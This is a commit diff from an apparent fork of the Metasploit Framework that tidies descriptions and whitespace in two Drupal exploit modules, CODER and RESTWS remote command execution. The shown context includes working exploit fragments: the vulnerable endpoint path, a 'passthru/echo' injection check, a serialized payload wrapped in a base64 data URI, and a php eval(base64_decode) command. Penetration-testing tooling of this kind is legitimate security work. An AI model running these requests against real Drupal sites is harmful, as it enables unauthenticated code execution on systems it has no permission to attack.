dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Clean up Mehmet modules

This commit is contained in:
William Vu 2016-08-15 00:58:07 -05:00
parent b4846e5793
commit 62d28f10cb
2 changed files with 19 additions and 11 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

20
modules/exploits/unix/webapp/drupal_coder_exec.rb
View File

@ -12,16 +12,17 @@ class MetasploitModule < Msf::Exploit::Remote
super(update_info(info,
'Name' => 'Drupal CODER Module Remote Command Execution',
'Description' => %q{
This module exploits a Remote Command Execution vulnerability in
Drupal CODER Module. Unauthenticated users can execute arbitrary command
under the context of the web server user.
This module exploits a Remote Command Execution vulnerability in the
Drupal CODER Module. Unauthenticated users can execute arbitrary
commands under the context of the web server user.
CODER module doesn't sufficiently validate user inputs in a script file
that has the php extension. A malicious unauthenticated user can make
requests directly to this file to execute arbitrary command.
The module does not need to be enabled for this to be exploited
The CODER module doesn't sufficiently validate user inputs in a script
file that has the PHP extension. A malicious unauthenticated user can
make requests directly to this file to execute arbitrary commands.
The module does not need to be enabled for this to be exploited.
This module was tested against CODER 2.5 with Drupal 7.5 installation on Ubuntu server.
This module was tested against CODER 2.5 with Drupal 7.5 installed on
Ubuntu Server.
},
'License' => MSF_LICENSE,
'Author' =>
@ -64,6 +65,7 @@ class MetasploitModule < Msf::Exploit::Remote
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'),
)
if res && res.body.include?('file parameter is not setNo path to parameter file')
Exploit::CheckCode::Appears
else
@ -84,7 +86,9 @@ class MetasploitModule < Msf::Exploit::Remote
p << ':"-v;'
p << payload.encoded
p << ' #";s:4:"name";s:4:"test";}}}'
payload = "data://text/plain;base64,#{Rex::Text.encode_base64(p)}"
send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'),

10
modules/exploits/unix/webapp/drupal_restws_exec.rb
View File

@ -12,7 +12,7 @@ class MetasploitModule < Msf::Exploit::Remote
super(update_info(info,
'Name' => 'Drupal RESTWS Module Remote PHP Code Execution',
'Description' => %q{
This module exploits a Remote PHP Code Execution vulnerability in
This module exploits a Remote PHP Code Execution vulnerability in the
Drupal RESTWS Module. Unauthenticated users can execute arbitrary code
under the context of the web server user.
@ -20,9 +20,10 @@ class MetasploitModule < Msf::Exploit::Remote
additional functionality. A vulnerability in this approach allows
an unauthenticated attacker to send specially crafted requests resulting
in arbitrary PHP execution. RESTWS 2.x prior to 2.6 and 1.x prior to 1.7
versions are affected by issue.
are affected by this issue.
This module was tested against RESTWS 2.5 with Drupal 7.5 installation on Ubuntu server.
This module was tested against RESTWS 2.5 with Drupal 7.5 installed on
Ubuntu Server.
},
'License' => MSF_LICENSE,
'Author' =>
@ -55,6 +56,7 @@ class MetasploitModule < Msf::Exploit::Remote
def check
r = rand_text_alpha(8 + rand(4))
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'index.php'),
@ -62,6 +64,7 @@ class MetasploitModule < Msf::Exploit::Remote
'q' => "taxonomy_vocabulary//passthru/echo #{r}"
}
)
if res && res.body.include?(r)
Exploit::CheckCode::Vulnerable
else
@ -71,6 +74,7 @@ class MetasploitModule < Msf::Exploit::Remote
def exploit
cmd = "php -r 'eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));'"
send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'index.php'),